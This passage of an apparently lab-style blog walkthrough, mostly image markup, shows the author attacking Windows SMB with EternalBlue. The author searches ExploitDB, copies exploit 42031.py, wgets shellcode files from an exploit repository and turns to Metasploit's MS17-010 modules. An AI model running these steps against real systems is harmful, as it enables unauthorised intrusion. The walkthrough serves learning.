srcset="https://substackcdn.com/image/fetch/$s_!x-bd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png 424w, https://substackcdn.com/image/fetch/$s_!x-bd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png 848w, https://substackcdn.com/image/fetch/$s_!x-bd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png 1272w, https://substackcdn.com/image/fetch/$s_!x-bd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!x-bd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!x-bd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png 424w, https://substackcdn.com/image/fetch/$s_!x-bd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png 848w, https://substackcdn.com/image/fetch/$s_!x-bd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png 1272w, https://substackcdn.com/image/fetch/$s_!x-bd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F550faa0f-fbb1-4a73-950b-3b011367bd4b_800x65.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!WwtE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!WwtE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png 424w, https://substackcdn.com/image/fetch/$s_!WwtE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png 848w, https://substackcdn.com/image/fetch/$s_!WwtE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png 1272w, https://substackcdn.com/image/fetch/$s_!WwtE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!WwtE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!WwtE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png 424w, https://substackcdn.com/image/fetch/$s_!WwtE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png 848w, https://substackcdn.com/image/fetch/$s_!WwtE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png 1272w, https://substackcdn.com/image/fetch/$s_!WwtE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F3e39a586-202f-4eb4-aee3-748beaef9c84_800x393.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>searchsploit eternal\ blue</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!u56y!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!u56y!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png 424w, https://substackcdn.com/image/fetch/$s_!u56y!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png 848w, https://substackcdn.com/image/fetch/$s_!u56y!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png 1272w, https://substackcdn.com/image/fetch/$s_!u56y!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!u56y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!u56y!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png 424w, https://substackcdn.com/image/fetch/$s_!u56y!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png 848w, https://substackcdn.com/image/fetch/$s_!u56y!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png 1272w, https://substackcdn.com/image/fetch/$s_!u56y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F26c29f93-27ba-4811-9207-6e45d9ac11b1_800x103.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s try this code that we got via cp <em>/usr/share/exploitdb/exploits/windows/remote/42031.py ./</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6jf6!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6jf6!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png 424w, https://substackcdn.com/image/fetch/$s_!6jf6!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png 848w, https://substackcdn.com/image/fetch/$s_!6jf6!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png 1272w, https://substackcdn.com/image/fetch/$s_!6jf6!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6jf6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6jf6!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png 424w, https://substackcdn.com/image/fetch/$s_!6jf6!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png 848w, https://substackcdn.com/image/fetch/$s_!6jf6!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png 1272w, https://substackcdn.com/image/fetch/$s_!6jf6!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F59f1b79a-2f30-4533-af3d-128cabcf76f0_800x53.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!spUJ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!spUJ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png 424w, https://substackcdn.com/image/fetch/$s_!spUJ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png 848w, https://substackcdn.com/image/fetch/$s_!spUJ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png 1272w, https://substackcdn.com/image/fetch/$s_!spUJ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!spUJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!spUJ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png 424w, https://substackcdn.com/image/fetch/$s_!spUJ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png 848w, https://substackcdn.com/image/fetch/$s_!spUJ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png 1272w, https://substackcdn.com/image/fetch/$s_!spUJ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F1e6c2d44-3ad6-41e8-a452-e2e791775462_800x388.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Oops, we may need some shellcode first. Let&#8217;s use wget to score those. <em>wget <a href="https://raw/githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42030.asm">https://raw/githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42030.asm</a></em> and <em>wget <a href="https://raw/githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42030.asm">https://raw/githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42031.asm</a></em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IFN7!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IFN7!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png 424w, https://substackcdn.com/image/fetch/$s_!IFN7!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png 848w, https://substackcdn.com/image/fetch/$s_!IFN7!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png 1272w, https://substackcdn.com/image/fetch/$s_!IFN7!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IFN7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!IFN7!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png 424w, https://substackcdn.com/image/fetch/$s_!IFN7!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png 848w, https://substackcdn.com/image/fetch/$s_!IFN7!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png 1272w, https://substackcdn.com/image/fetch/$s_!IFN7!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F905cdcac-b3dd-49c2-a12f-4689e8357c09_800x349.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Let&#8217;s try this.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!XgQT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!XgQT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png 424w, https://substackcdn.com/image/fetch/$s_!XgQT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png 848w, https://substackcdn.com/image/fetch/$s_!XgQT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png 1272w, https://substackcdn.com/image/fetch/$s_!XgQT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!XgQT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!XgQT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png 424w, https://substackcdn.com/image/fetch/$s_!XgQT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png 848w, https://substackcdn.com/image/fetch/$s_!XgQT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png 1272w, https://substackcdn.com/image/fetch/$s_!XgQT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F4ce2c7b9-4ded-4a21-a26e-298f43672da9_800x163.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Nope. Instead of researching why, I had an itch to pwn, so I used metasploit via <em>msfconsole. </em>Let&#8217;s search using <em>17&#8211;010 </em>as our parameter.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!gbhf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fc86e344b-ea34-4ecc-aa87-715b5268d73d_800x179.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 